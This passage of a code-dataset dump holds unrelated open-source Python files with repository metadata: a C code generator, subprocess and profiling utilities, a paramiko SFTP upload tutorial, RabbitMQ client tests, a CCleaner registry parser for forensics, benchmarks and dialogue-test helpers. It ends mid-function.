openbmc/build/tmp/deploy/sdk/witherspoon-2019-08-08/sysroots/armv6-openbmc-linux-gnueabi/usr/lib/gobject-introspection/giscanner/codegen.py | sotaoverride/backup | 0 | 3420 | <gh_stars>0
# -*- Mode: Python -*-
# GObject-Introspection - a framework for introspecting GObject libraries
# Copyright (C) 2010 Red Hat, Inc.
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the
# Free Software Foundation, Inc., 59 Temple Place - Suite 330,
# Boston, MA 02111-1307, USA.
#
import os
from contextlib import contextmanager
from . import ast
class CCodeGenerator(object):
def __init__(self, namespace,
out_h_filename,
out_c_filename,
function_decoration=[],
include_first_header=[],
include_last_header=[],
include_first_src=[],
include_last_src=[]):
self.out_h_filename = out_h_filename
self.out_c_filename = out_c_filename
self.function_decoration = function_decoration
self.include_first_header = include_first_header
self.include_last_header = include_last_header
self.include_first_src = include_first_src
self.include_last_src = include_last_src
self._function_bodies = {}
self.namespace = namespace
def gen_symbol(self, name):
name = name.replace(' ', '_')
return '%s_%s' % (self.namespace.symbol_prefixes[0], name)
def _typecontainer_to_ctype(self, param):
if (isinstance(param, ast.Parameter)
and param.direction in (ast.PARAM_DIRECTION_OUT, ast.PARAM_DIRECTION_INOUT)):
suffix = '*'
else:
suffix = ''
if (param.type.is_equiv((ast.TYPE_STRING, ast.TYPE_FILENAME))
and param.transfer == ast.PARAM_TRANSFER_NONE):
return "const gchar*" + suffix
return param.type.ctype + suffix
def _write_prelude(self, out, func):
if self.function_decoration:
out.write("""
%s""" % " ".join(self.function_decoration))
out.write("""
%s
%s (""" % (self._typecontainer_to_ctype(func.retval), func.symbol))
l = len(func.parameters)
if func.parameters:
for i, param in enumerate(func.parameters):
ctype = self._typecontainer_to_ctype(param)
out.write('%s %s' % (ctype, param.argname))
if i < l - 1:
out.write(", ")
else:
out.write('void')
out.write(")")
def _write_prototype(self, func):
self._write_prelude(self.out_h, func)
self.out_h.write(";\n\n")
def _write_annotation_transfer(self, node):
if (node.type not in ast.BASIC_TYPES or
node.type.ctype.endswith('*')):
self.out_c.write(" (transfer %s)" % (node.transfer, ))
def _write_docs(self, func):
self.out_c.write("/**\n * %s:\n" % (func.symbol, ))
for param in func.parameters:
self.out_c.write(" * @%s" % (param.argname, ))
if param.direction in (ast.PARAM_DIRECTION_OUT,
ast.PARAM_DIRECTION_INOUT):
if param.caller_allocates:
allocate_string = ' caller-allocates'
else:
allocate_string = ''
self.out_c.write(": (%s%s) " % (param.direction,
allocate_string))
self._write_annotation_transfer(param)
self.out_c.write(":\n")
self.out_c.write(' *\n')
self.out_c.write(' * Undocumented.')
if func.retval.type != ast.TYPE_NONE:
self.out_c.write('\n *\n')
self.out_c.write(' * Returns: ')
self._write_annotation_transfer(func.retval)
self.out_c.write('\n */')
@contextmanager
def _function(self, func):
self._write_prototype(func)
self._write_docs(func)
self._write_prelude(self.out_c, func)
self.out_c.write("\n{\n")
yield
self.out_c.write("}\n\n")
def _codegen_start(self):
warning = '/* GENERATED BY testcodegen.py; DO NOT EDIT */\n\n'
self.out_h.write(warning)
nsupper = self.namespace.name.upper()
for header in self.include_first_header:
self.out_h.write("""#include "%s"\n""" % header)
self.out_h.write("""
#ifndef __%s_H__
#define __%s_H__
#include <glib-object.h>
""" % (nsupper, nsupper))
for header in self.include_last_header:
self.out_h.write("""#include "%s"\n""" % header)
self.out_c.write(warning)
for header in self.include_first_src:
self.out_c.write("""#include "%s"\n""" % header)
src_dir = os.path.dirname(os.path.realpath(self.out_c.name))
header = os.path.relpath(self.out_h_filename, src_dir)
self.out_c.write("""#include "%s"\n\n""" % (header, ))
for header in self.include_last_src:
self.out_c.write("""#include "%s"\n""" % header)
def _codegen_end(self):
self.out_h.write("""#endif\n""")
self.out_h.close()
self.out_c.close()
def set_function_body(self, node, body):
assert isinstance(node, ast.Function)
self._function_bodies[node] = body
def codegen(self):
self.out_h = open(self.out_h_filename, 'w')
self.out_c = open(self.out_c_filename, 'w')
self._codegen_start()
for node in self.namespace.values():
if isinstance(node, ast.Function):
with self._function(node):
body = self._function_bodies.get(node)
if not body:
body = ''
self.out_c.write(body)
self._codegen_end()
| 1.867188 | 2 |
nevergrad/parametrization/utils.py | mehrdad-shokri/nevergrad | 2 | 3421 | # Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import os
import sys
import shutil
import tempfile
import subprocess
import typing as tp
from pathlib import Path
from nevergrad.common import tools as ngtools
class Descriptors:
"""Provides access to a set of descriptors for the parametrization
This can be used within optimizers.
""" # TODO add repr
# pylint: disable=too-many-arguments
def __init__(
self,
deterministic: bool = True,
deterministic_function: bool = True,
monoobjective: bool = True,
not_manyobjective: bool = True,
continuous: bool = True,
metrizable: bool = True,
ordered: bool = True,
) -> None:
self.deterministic = deterministic
self.deterministic_function = deterministic_function
self.continuous = continuous
self.metrizable = metrizable
self.ordered = ordered
self.monoobjective = monoobjective
self.not_manyobjective = not_manyobjective
def __and__(self, other: "Descriptors") -> "Descriptors":
values = {field: getattr(self, field) & getattr(other, field) for field in self.__dict__}
return Descriptors(**values)
def __repr__(self) -> str:
diff = ",".join(f"{x}={y}" for x, y in sorted(ngtools.different_from_defaults(instance=self, check_mismatches=True).items()))
return f"{self.__class__.__name__}({diff})"
class NotSupportedError(RuntimeError):
"""This type of operation is not supported by the parameter.
"""
class TemporaryDirectoryCopy(tempfile.TemporaryDirectory): # type: ignore
"""Creates a full copy of a directory inside a temporary directory
This class can be used as TemporaryDirectory but:
- the created copy path is available through the copyname attribute
- the contextmanager returns the clean copy path
- the directory where the temporary directory will be created
can be controlled through the CLEAN_COPY_DIRECTORY environment
variable
"""
key = "CLEAN_COPY_DIRECTORY"
@classmethod
def set_clean_copy_environment_variable(cls, directory: tp.Union[Path, str]) -> None:
"""Sets the CLEAN_COPY_DIRECTORY environment variable in
order for subsequent calls to use this directory as base for the
copies.
"""
assert Path(directory).exists(), "Directory does not exist"
os.environ[cls.key] = str(directory)
# pylint: disable=redefined-builtin
def __init__(self, source: tp.Union[Path, str], dir: tp.Optional[tp.Union[Path, str]] = None) -> None:
if dir is None:
dir = os.environ.get(self.key, None)
super().__init__(prefix="tmp_clean_copy_", dir=dir)
self.copyname = Path(self.name) / Path(source).name
shutil.copytree(str(source), str(self.copyname))
def __enter__(self) -> Path:
super().__enter__()
return self.copyname
class FailedJobError(RuntimeError):
"""Job failed during processing
"""
class CommandFunction:
"""Wraps a command as a function in order to make sure it goes through the
pipeline and notify when it is finished.
The output is a string containing everything that has been sent to stdout
Parameters
----------
command: list
command to run, as a list
verbose: bool
prints the command and stdout at runtime
cwd: Path/str
path to the location where the command must run from
Returns
-------
str
Everything that has been sent to stdout
"""
def __init__(self, command: tp.List[str], verbose: bool = False, cwd: tp.Optional[tp.Union[str, Path]] = None,
env: tp.Optional[tp.Dict[str, str]] = None) -> None:
if not isinstance(command, list):
raise TypeError("The command must be provided as a list")
self.command = command
self.verbose = verbose
self.cwd = None if cwd is None else str(cwd)
self.env = env
def __call__(self, *args: tp.Any, **kwargs: tp.Any) -> str:
"""Call the cammand line with addidional arguments
The keyword arguments will be sent as --{key}={val}
The logs are bufferized. They will be printed if the job fails, or sent as output of the function
Errors are provided with the internal stderr
"""
# TODO make the following command more robust (probably fails in multiple cases)
full_command = self.command + [str(x) for x in args] + ["--{}={}".format(x, y) for x, y in kwargs.items()]
if self.verbose:
print(f"The following command is sent: {full_command}")
outlines: tp.List[str] = []
with subprocess.Popen(full_command, stdout=subprocess.PIPE, stderr=subprocess.PIPE,
shell=False, cwd=self.cwd, env=self.env) as process:
try:
assert process.stdout is not None
for line in iter(process.stdout.readline, b''):
if not line:
break
outlines.append(line.decode().strip())
if self.verbose:
print(outlines[-1], flush=True)
except Exception: # pylint: disable=broad-except
process.kill()
process.wait()
raise FailedJobError("Job got killed for an unknown reason.")
stderr = process.communicate()[1] # we already got stdout
stdout = "\n".join(outlines)
retcode = process.poll()
if stderr and (retcode or self.verbose):
print(stderr.decode(), file=sys.stderr)
if retcode:
subprocess_error = subprocess.CalledProcessError(retcode, process.args, output=stdout, stderr=stderr)
raise FailedJobError(stderr.decode()) from subprocess_error
return stdout
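

# Illustrative usage sketch (assumes a POSIX "echo" binary on the PATH):
# wrap a command once, then call it like a regular function with extra args.
if __name__ == "__main__":
    echo = CommandFunction(["echo", "hello"], verbose=True)
    output = echo("world")  # runs: echo hello world
    print(output)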
| 2.28125 | 2 |
Section 20/2.Document-transfer_files.py | airbornum/-Complete-Python-Scripting-for-Automation | 18 | 3422 | <gh_stars>10-100
import paramiko
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
ssh.connect(hostname='172.16.58.3',username='ec2-user',password='<PASSWORD>',port=22)
sftp_client=ssh.open_sftp()
#sftp_client.get('/home/ec2-user/paramiko_download.txt','paramiko_downloaded_file.txt')
#sftp_client.chdir("/home/ec2-user")
#print(sftp_client.getcwd())
#sftp_client.get('demo.txt','C:\\Users\\Automation\\Desktop\\download_file.txt')
sftp_client.put("transfer_files.py",'/home/ec2-user/transfer_files.py')
sftp_client.close()
ssh.close() | 2.328125 | 2 |
nimlime_core/utils/internal_tools.py | gmpreussner/Varriount.NimLime | 0 | 3423 | # coding=utf-8
"""
Internal tools for NimLime development & testing.
"""
from pprint import pprint
import sublime
try:
from cProfile import Profile
except ImportError:
from profile import Profile
from functools import wraps
from pstats import Stats
try:
from StringIO import StringIO
except ImportError:
from io import StringIO
debug_on = False
if debug_on:
sublime.message_dialog("NimLime running in debug mode.")
# Debug printer
def print_debug(*args, **kwargs):
"""
Print when debugging.
:type args: Any
:type kwargs: Any
"""
if debug_on:
pprint(*args, **kwargs)
# Profiling functions
profiler = Profile()
profiler_running = False
def profile_func(func):
"""
Decorator which profiles a single function.
Call print_profile_data to print the collected data.
:type func: Callable
:rtype: Callable
"""
@wraps(func)
def _profile_wrapper(*args, **kwargs):
global profiler_running
if not profiler_running:
profiler_running = True
try:
profiler.enable()
return func(*args, **kwargs)
finally:
profiler.disable()
profiler_running = False
return _profile_wrapper
def print_profile_data():
"""
Print the collected profile data.
"""
stream = StringIO()
statistics = Stats(profiler, stream=stream)
statistics.sort_stats('cumulative')
statistics.print_stats()
print(stream.getvalue())
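

# Hypothetical usage sketch; the _demo_* names below are illustrative
# additions, not part of NimLime itself.
@profile_func
def _demo_workload():
    return sum(i * i for i in range(100000))


def _demo_print_profile():
    _demo_workload()
    print_profile_data()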
| 1.96875 | 2 |
test/unit/test_monitor.py | dmvieira/driftage | 4 | 3424 | import orjson
from asynctest import TestCase, Mock, patch
from freezegun import freeze_time
from driftage.monitor import Monitor
class TestMonitor(TestCase):
def setUp(self):
self.monitor = Monitor(
"user_test@local", "<PASSWORD>", "identif"
)
def tearDown(self):
self.monitor.container.stop()
def test_should_set_identifier_or_agent_name(self):
self.assertEqual(
self.monitor._identifier,
"identif"
)
monitor = Monitor(
"user_test2@local", "<PASSWORD>"
)
self.assertEqual(
monitor._identifier,
"user_test2"
)
monitor.container.stop()
@patch("driftage.monitor.WaitMonitorSubscriptions")
async def test_should_add_subscription_behaviour(self, behaviour_mock):
self.monitor.add_behaviour = Mock()
await self.monitor.setup()
self.monitor.add_behaviour.assert_called_once_with(
behaviour_mock()
)
@freeze_time("1989-08-12")
@patch("driftage.monitor.FastNotifyContacts")
@patch("driftage.monitor.Template")
def test_should_notify_contacts_on_new_data(
self, template_mock, behaviour_mock):
self.monitor.add_behaviour = Mock()
self.monitor.collect({"my data": 1})
self.monitor.add_behaviour.assert_called_once_with(
behaviour_mock(),
template=template_mock.return_value
)
template_mock.assert_called_once_with(
body=str(orjson.dumps({
"data": {"my data": 1},
"metadata": {
"timestamp": 618883200.0,
"identifier": "identif"
}
}), "utf-8")
)
@freeze_time("1989-08-12")
@patch("driftage.monitor.FastNotifyContacts")
@patch("driftage.monitor.Template")
def test_should_notify_contacts_on_new_data_with_call(
self, template_mock, behaviour_mock):
self.monitor.add_behaviour = Mock()
self.monitor({"my data": 1})
self.monitor.add_behaviour.assert_called_once_with(
behaviour_mock(),
template=template_mock.return_value
)
template_mock.assert_called_once_with(
body=str(orjson.dumps({
"data": {"my data": 1},
"metadata": {
"timestamp": 618883200.0,
"identifier": "identif"
}
}), "utf-8")
)
| 2.328125 | 2 |
examples/todo_advanced/main.py | travisluong/fastarg | 1 | 3425 | <filename>examples/todo_advanced/main.py
import fastarg
import commands.todo as todo
import commands.user as user
app = fastarg.Fastarg(description="productivity app", prog="todo")
@app.command()
def hello_world(name: str):
"""hello world"""
print("hello " + name)
app.add_fastarg(todo.app, name="todo")
app.add_fastarg(user.app, name="user")
if __name__ == "__main__":
app.run() | 2.546875 | 3 |
tests/test_channel.py | rwilhelm/aiormq | 176 | 3426 | import asyncio
import uuid
import pytest
from aiomisc_pytest.pytest_plugin import TCPProxy
import aiormq
async def test_simple(amqp_channel: aiormq.Channel):
await amqp_channel.basic_qos(prefetch_count=1)
assert amqp_channel.number
queue = asyncio.Queue()
deaclare_ok = await amqp_channel.queue_declare(auto_delete=True)
consume_ok = await amqp_channel.basic_consume(deaclare_ok.queue, queue.put)
await amqp_channel.basic_publish(
b"foo",
routing_key=deaclare_ok.queue,
properties=aiormq.spec.Basic.Properties(message_id="123"),
)
message = await queue.get() # type: DeliveredMessage
assert message.body == b"foo"
cancel_ok = await amqp_channel.basic_cancel(consume_ok.consumer_tag)
assert cancel_ok.consumer_tag == consume_ok.consumer_tag
assert cancel_ok.consumer_tag not in amqp_channel.consumers
await amqp_channel.queue_delete(deaclare_ok.queue)
deaclare_ok = await amqp_channel.queue_declare(auto_delete=True)
await amqp_channel.basic_publish(b"foo bar", routing_key=deaclare_ok.queue)
message = await amqp_channel.basic_get(deaclare_ok.queue, no_ack=True)
assert message.body == b"foo bar"
async def test_blank_body(amqp_channel: aiormq.Channel):
await amqp_channel.basic_qos(prefetch_count=1)
assert amqp_channel.number
queue = asyncio.Queue()
deaclare_ok = await amqp_channel.queue_declare(auto_delete=True)
consume_ok = await amqp_channel.basic_consume(deaclare_ok.queue, queue.put)
await amqp_channel.basic_publish(
b"",
routing_key=deaclare_ok.queue,
properties=aiormq.spec.Basic.Properties(message_id="123"),
)
message = await queue.get() # type: DeliveredMessage
assert message.body == b""
cancel_ok = await amqp_channel.basic_cancel(consume_ok.consumer_tag)
assert cancel_ok.consumer_tag == consume_ok.consumer_tag
assert cancel_ok.consumer_tag not in amqp_channel.consumers
await amqp_channel.queue_delete(deaclare_ok.queue)
deaclare_ok = await amqp_channel.queue_declare(auto_delete=True)
await amqp_channel.basic_publish(b"foo bar", routing_key=deaclare_ok.queue)
message = await amqp_channel.basic_get(deaclare_ok.queue, no_ack=True)
assert message.body == b"foo bar"
@pytest.mark.no_catch_loop_exceptions
async def test_bad_consumer(amqp_channel: aiormq.Channel, loop):
channel = amqp_channel # type: aiormq.Channel
await channel.basic_qos(prefetch_count=1)
declare_ok = await channel.queue_declare()
future = loop.create_future()
await channel.basic_publish(b"urgent", routing_key=declare_ok.queue)
consumer_tag = loop.create_future()
async def bad_consumer(message):
await channel.basic_cancel(await consumer_tag)
future.set_result(message)
raise Exception
consume_ok = await channel.basic_consume(
declare_ok.queue, bad_consumer, no_ack=False,
)
consumer_tag.set_result(consume_ok.consumer_tag)
message = await future
await channel.basic_reject(message.delivery.delivery_tag, requeue=True)
assert message.body == b"urgent"
future = loop.create_future()
await channel.basic_consume(
declare_ok.queue, future.set_result, no_ack=True,
)
message = await future
assert message.body == b"urgent"
async def test_ack_nack_reject(amqp_channel: aiormq.Channel):
channel = amqp_channel # type: aiormq.Channel
await channel.basic_qos(prefetch_count=1)
declare_ok = await channel.queue_declare(auto_delete=True)
queue = asyncio.Queue()
await channel.basic_consume(declare_ok.queue, queue.put, no_ack=False)
await channel.basic_publish(b"rejected", routing_key=declare_ok.queue)
message = await queue.get()
assert message.body == b"rejected"
await channel.basic_reject(message.delivery.delivery_tag, requeue=False)
await channel.basic_publish(b"nacked", routing_key=declare_ok.queue)
message = await queue.get()
assert message.body == b"nacked"
await channel.basic_nack(message.delivery.delivery_tag, requeue=False)
await channel.basic_publish(b"acked", routing_key=declare_ok.queue)
message = await queue.get()
assert message.body == b"acked"
await channel.basic_ack(message.delivery.delivery_tag)
async def test_confirm_multiple(amqp_channel: aiormq.Channel):
"""
RabbitMQ has been observed to send confirmations in a strange pattern
when publishing simultaneously where only some messages are delivered
to a queue. It sends acks like this 1 2 4 5(multiple, confirming also 3).
This test is probably inconsequential without publisher_confirms
This is a regression for https://github.com/mosquito/aiormq/issues/10
"""
channel = amqp_channel # type: aiormq.Channel
exchange = uuid.uuid4().hex
await channel.exchange_declare(exchange, exchange_type="topic")
try:
declare_ok = await channel.queue_declare(exclusive=True)
await channel.queue_bind(
declare_ok.queue, exchange, routing_key="test.5",
)
for i in range(10):
messages = [
asyncio.ensure_future(channel.basic_publish(
b"test", exchange=exchange, routing_key="test.{}".format(i),
))
for i in range(10)
]
_, pending = await asyncio.wait(messages, timeout=0.2)
assert not pending, "not all publishes were completed (confirmed)"
await asyncio.sleep(0.05)
finally:
await channel.exchange_delete(exchange)
async def test_exclusive_queue_locked(amqp_connection):
channel0 = await amqp_connection.channel()
channel1 = await amqp_connection.channel()
qname = str(uuid.uuid4())
await channel0.queue_declare(qname, exclusive=True)
try:
await channel0.basic_consume(qname, print, exclusive=True)
with pytest.raises(aiormq.exceptions.ChannelLockedResource):
await channel1.queue_declare(qname)
await channel1.basic_consume(qname, print, exclusive=True)
finally:
await channel0.queue_delete(qname)
async def test_remove_writer_when_closed(amqp_channel: aiormq.Channel):
with pytest.raises(aiormq.exceptions.ChannelClosed):
await amqp_channel.queue_declare(
"amq.forbidden_queue_name", auto_delete=True,
)
with pytest.raises(aiormq.exceptions.ChannelInvalidStateError):
await amqp_channel.queue_delete("amq.forbidden_queue_name")
async def test_proxy_connection(proxy_connection, proxy: TCPProxy):
channel = await proxy_connection.channel() # type: aiormq.Channel
await channel.queue_declare(auto_delete=True)
async def test_declare_queue_timeout(proxy_connection, proxy: TCPProxy):
for _ in range(3):
channel = await proxy_connection.channel() # type: aiormq.Channel
qname = str(uuid.uuid4())
with proxy.slowdown(read_delay=5, write_delay=0):
with pytest.raises(asyncio.TimeoutError):
await channel.queue_declare(
qname, auto_delete=True, timeout=0.5
)
| 2.0625 | 2 |
nitro-python/nssrc/com/citrix/netscaler/nitro/resource/stat/mediaclassification/__init__.py | culbertm/NSttyPython | 2 | 3427 | __all__ = ['mediaclassification_stats'] | 1.09375 | 1 |
balanced_parens.py | joeghodsi/interview-questions | 1 | 3428 | '''
Problem description:
Given a string, determine whether or not the parentheses are balanced
'''
def balanced_parens(str):
'''
runtime: O(n)
space : O(1)
'''
if str is None:
return True
open_count = 0
for char in str:
if char == '(':
open_count += 1
elif char == ')':
open_count -= 1
if open_count < 0:
return False
return open_count == 0
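# Example usage (illustrative sanity checks). Note that this counter-based
# approach only tracks '(' and ')'; every other character is ignored, and the
# scan fails as soon as the count dips below zero.
if __name__ == '__main__':
    assert balanced_parens(None) is True
    assert balanced_parens('') is True
    assert balanced_parens('(a(b)c)') is True
    assert balanced_parens('(()') is False
    assert balanced_parens(')(') is False  # a paren closes before any opens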
| 3.96875 | 4 |
plaso/parsers/winreg_plugins/ccleaner.py | pyllyukko/plaso | 1,253 | 3429 | # -*- coding: utf-8 -*-
"""Parser for the CCleaner Registry key."""
import re
from dfdatetime import time_elements as dfdatetime_time_elements
from plaso.containers import events
from plaso.containers import time_events
from plaso.lib import definitions
from plaso.parsers import winreg_parser
from plaso.parsers.winreg_plugins import interface
class CCleanerConfigurationEventData(events.EventData):
"""CCleaner configuration event data.
Attributes:
configuration (str): CCleaner configuration.
key_path (str): Windows Registry key path.
"""
DATA_TYPE = 'ccleaner:configuration'
def __init__(self):
"""Initializes event data."""
super(CCleanerConfigurationEventData, self).__init__(
data_type=self.DATA_TYPE)
self.configuration = None
self.key_path = None
class CCleanerUpdateEventData(events.EventData):
"""CCleaner update event data.
Attributes:
key_path (str): Windows Registry key path.
"""
DATA_TYPE = 'ccleaner:update'
def __init__(self):
"""Initializes event data."""
super(CCleanerUpdateEventData, self).__init__(data_type=self.DATA_TYPE)
self.key_path = None
class CCleanerPlugin(interface.WindowsRegistryPlugin):
"""Gathers the CCleaner Keys for NTUSER hive.
Known Windows Registry values within the CCleaner key:
* (App)Cookies [REG_SZ], contains "True" if the cookies should be cleaned;
* (App)Delete Index.dat files [REG_SZ]
* (App)History [REG_SZ]
* (App)Last Download Location [REG_SZ]
* (App)Other Explorer MRUs [REG_SZ]
* (App)Recent Documents [REG_SZ]
* (App)Recently Typed URLs [REG_SZ]
* (App)Run (in Start Menu) [REG_SZ]
* (App)Temporary Internet Files [REG_SZ]
* (App)Thumbnail Cache [REG_SZ]
* CookiesToSave [REG_SZ]
* UpdateKey [REG_SZ], contains a date and time formatted as:
"MM/DD/YYYY hh:mm:ss [A|P]M", for example "07/13/2013 10:03:14 AM";
* WINDOW_HEIGHT [REG_SZ], contains the windows height in number of pixels;
* WINDOW_LEFT [REG_SZ]
* WINDOW_MAX [REG_SZ]
* WINDOW_TOP [REG_SZ]
* WINDOW_WIDTH [REG_SZ], contains the windows width in number of pixels;
Also see:
http://cheeky4n6monkey.blogspot.com/2012/02/writing-ccleaner-regripper-plugin-part_05.html
"""
NAME = 'ccleaner'
DATA_FORMAT = 'CCleaner Registry data'
FILTERS = frozenset([
interface.WindowsRegistryKeyPathFilter(
'HKEY_CURRENT_USER\\Software\\Piriform\\CCleaner')])
# Date and time string formatted as: "MM/DD/YYYY hh:mm:ss [A|P]M"
# for example "07/13/2013 10:03:14 AM"
# TODO: determine if this is true for other locales.
_UPDATE_DATE_TIME_RE = re.compile(
r'([0-9][0-9])/([0-9][0-9])/([0-9][0-9][0-9][0-9]) '
r'([0-9][0-9]):([0-9][0-9]):([0-9][0-9]) ([A|P]M)')
def _ParseUpdateKeyValue(self, parser_mediator, registry_value):
"""Parses the UpdateKey value.
Args:
parser_mediator (ParserMediator): mediates interactions between parsers
and other components, such as storage and dfvfs.
registry_value (dfwinreg.WinRegistryValue): Windows Registry value.
Returns:
dfdatetime_time_elements.TimeElements: date and time value or None
if not available.
"""
if not registry_value.DataIsString():
parser_mediator.ProduceExtractionWarning(
'unsupported UpdateKey value data type: {0:s}'.format(
registry_value.data_type_string))
return None
date_time_string = registry_value.GetDataAsObject()
if not date_time_string:
parser_mediator.ProduceExtractionWarning('missing UpdateKey value data')
return None
re_match = self._UPDATE_DATE_TIME_RE.match(date_time_string)
if not re_match:
parser_mediator.ProduceExtractionWarning(
'unsupported UpdateKey value data: {0!s}'.format(date_time_string))
return None
month, day_of_month, year, hours, minutes, seconds, part_of_day = (
re_match.groups())
try:
year = int(year, 10)
month = int(month, 10)
day_of_month = int(day_of_month, 10)
hours = int(hours, 10)
minutes = int(minutes, 10)
seconds = int(seconds, 10)
except (TypeError, ValueError):
parser_mediator.ProduceExtractionWarning(
'invalid UpdateKey date time value: {0!s}'.format(date_time_string))
return None
if part_of_day == 'PM':
hours += 12
time_elements_tuple = (year, month, day_of_month, hours, minutes, seconds)
try:
date_time = dfdatetime_time_elements.TimeElements(
time_elements_tuple=time_elements_tuple)
date_time.is_local_time = True
except ValueError:
parser_mediator.ProduceExtractionWarning(
'invalid UpdateKey date time value: {0!s}'.format(
time_elements_tuple))
return None
return date_time
def ExtractEvents(self, parser_mediator, registry_key, **kwargs):
"""Extracts events from a Windows Registry key.
Args:
parser_mediator (ParserMediator): mediates interactions between parsers
and other components, such as storage and dfvfs.
registry_key (dfwinreg.WinRegistryKey): Windows Registry key.
"""
configuration = []
date_time = None
for registry_value in registry_key.GetValues():
if not registry_value.name or not registry_value.data:
continue
if registry_value.name == 'UpdateKey':
date_time = self._ParseUpdateKeyValue(parser_mediator, registry_value)
else:
value = registry_value.GetDataAsObject()
configuration.append('{0:s}: {1!s}'.format(registry_value.name, value))
if date_time:
event_data = CCleanerUpdateEventData()
event_data.key_path = registry_key.path
event = time_events.DateTimeValuesEvent(
date_time, definitions.TIME_DESCRIPTION_UPDATE,
time_zone=parser_mediator.timezone)
parser_mediator.ProduceEventWithEventData(event, event_data)
event_data = CCleanerConfigurationEventData()
event_data.configuration = ' '.join(sorted(configuration)) or None
event_data.key_path = registry_key.path
event = time_events.DateTimeValuesEvent(
registry_key.last_written_time, definitions.TIME_DESCRIPTION_WRITTEN)
parser_mediator.ProduceEventWithEventData(event, event_data)
winreg_parser.WinRegistryParser.RegisterPlugin(CCleanerPlugin)
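# Illustrative sketch only: shows how an UpdateKey value such as the example
# from the class docstring is expected to match the plugin's regular
# expression. The helper below is not part of the plaso API.
def _demo_update_key_match(value='07/13/2013 10:03:14 AM'):
  match = CCleanerPlugin._UPDATE_DATE_TIME_RE.match(value)
  if not match:
    return None
  month, day_of_month, year, hours, minutes, seconds, part_of_day = (
      match.groups())
  # Shift "PM" times onto a 24-hour clock, mirroring _ParseUpdateKeyValue().
  hours = int(hours, 10) + (12 if part_of_day == 'PM' else 0)
  return (int(year, 10), int(month, 10), int(day_of_month, 10), hours,
          int(minutes, 10), int(seconds, 10))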
| 2.21875 | 2 |
pushpluck/base.py | ejconlon/pushpluck | 0 | 3430 | <reponame>ejconlon/pushpluck
from abc import ABCMeta, abstractmethod
from dataclasses import dataclass
from typing import Any, TypeVar
X = TypeVar('X')
class Closeable(metaclass=ABCMeta):
@abstractmethod
def close(self) -> None:
""" Close this to free resources and deny further use. """
raise NotImplementedError()
class Resettable(metaclass=ABCMeta):
@abstractmethod
def reset(self) -> None:
""" Reset this to a known good state for further use. """
raise NotImplementedError()
class Void:
""" None is the type with 1 inhabitant, None. Void is the type with 0 inhabitants. """
def __init__(self) -> None:
raise Exception('Cannot instantiate Void')
def absurd(self) -> X:
"""
This allows you to trivially satisfy type checking by returning
`void.absurd()` since it's impossible for `void` to exist in the first place.
"""
raise Exception('Absurd')
@dataclass(frozen=True)
class Unit:
""" A simple type with one inhabitant (according to eq and hash). """
@staticmethod
def instance() -> 'Unit':
return _UNIT_SINGLETON
_UNIT_SINGLETON = Unit()
class MatchException(Exception):
def __init__(self, value: Any) -> None:
super().__init__(f'Failed to match value: {value}')
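# Minimal usage sketch (illustrative only; _Counter is not part of pushpluck):
# a small resource that implements both Resettable and Closeable.
class _Counter(Resettable, Closeable):
    def __init__(self) -> None:
        self.count = 0
        self.closed = False
    def reset(self) -> None:
        self.count = 0
    def close(self) -> None:
        self.closed = True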
| 3.078125 | 3 |
test/cuberead/highres/test_default_high_res.py | CAB-LAB/cube-performance-test | 0 | 3431 | import time
import pytest
from test import config
from test.cube_utils import CubeUtils
ITERATIONS_NUM = getattr(config, 'iterations_num', 1)
ROUNDS_NUM = getattr(config, 'rounds_num', 10)
class TestDefaultHighRes:
@pytest.fixture(scope="class", autouse=True)
def cube_default(self):
cube_utils = CubeUtils()
cube_utils.generate_cube("default_high_res", 46, 2160, 4320)
yield cube_utils
# ---------------
# Read spatially
# ---------------
@pytest.mark.benchmark(
group="Cube reading for small area spatial analysis high-res",
timer=time.perf_counter,
disable_gc=True,
warmup=False
)
def test_read_default_high_res_135x135(self, benchmark, cube_default):
benchmark.pedantic(cube_default.read_spatial, args=(135,), iterations=ITERATIONS_NUM, rounds=ROUNDS_NUM)
@pytest.mark.benchmark(
group="Cube reading for large area spatial analysis high-res",
timer=time.perf_counter,
disable_gc=True,
warmup=False
)
def test_read_default_high_res_2160x2160(self, benchmark, cube_default):
benchmark.pedantic(cube_default.read_spatial, args=(2160,), iterations=ITERATIONS_NUM, rounds=ROUNDS_NUM)
# ---------------
# Read temporally
# ---------------
@pytest.mark.benchmark(
group="Cube reading for subset temporal analysis high-res",
timer=time.perf_counter,
disable_gc=True,
warmup=False
)
def test_read_default_high_res_46x135x135(self, benchmark, cube_default):
benchmark.pedantic(cube_default.read_temporal, args=(135,), iterations=ITERATIONS_NUM, rounds=ROUNDS_NUM)
@pytest.mark.benchmark(
group="Cube reading for global temporal analysis high-res",
timer=time.perf_counter,
disable_gc=True,
warmup=False
)
def test_read_default_high_res_46x2160x2160(self, benchmark, cube_default):
benchmark.pedantic(cube_default.read_temporal, args=(2160,), iterations=ITERATIONS_NUM, rounds=ROUNDS_NUM)
| 1.992188 | 2 |
tests/components/test_dialogue_flow.py | dyoshiha/mindmeld | 1 | 3432 | import pytest
from mindmeld.components import Conversation
def assert_reply(directives, templates, *, start_index=0, slots=None):
"""Asserts that the provided directives contain the specified reply
Args:
directives (list[dict[str, dict]]): list of directives returned by application
templates (Union[str, Set[str]]): The reply must be a member of this set.
start_index (int, optional): The index of the first client action associated
with this reply.
slots (dict, optional): The slots to fill the templates
"""
slots = slots or {}
if isinstance(templates, str):
templates = [templates]
texts = set(map(lambda x: x.format(**slots), templates))
assert len(directives) >= start_index + 1
assert directives[start_index]['name'] == 'reply'
assert directives[start_index]['payload']['text'] in texts
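# Illustrative example of the directive structure the helper above expects;
# the field names mirror the assertions, the values are made up.
_EXAMPLE_DIRECTIVES = [
    {'name': 'reply', 'payload': {'text': 'Hello, Malcolm!'}},
]
# e.g. assert_reply(_EXAMPLE_DIRECTIVES, 'Hello, {name}!', slots={'name': 'Malcolm'})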
def assert_target_dialogue_state(convo, target_dialogue_state):
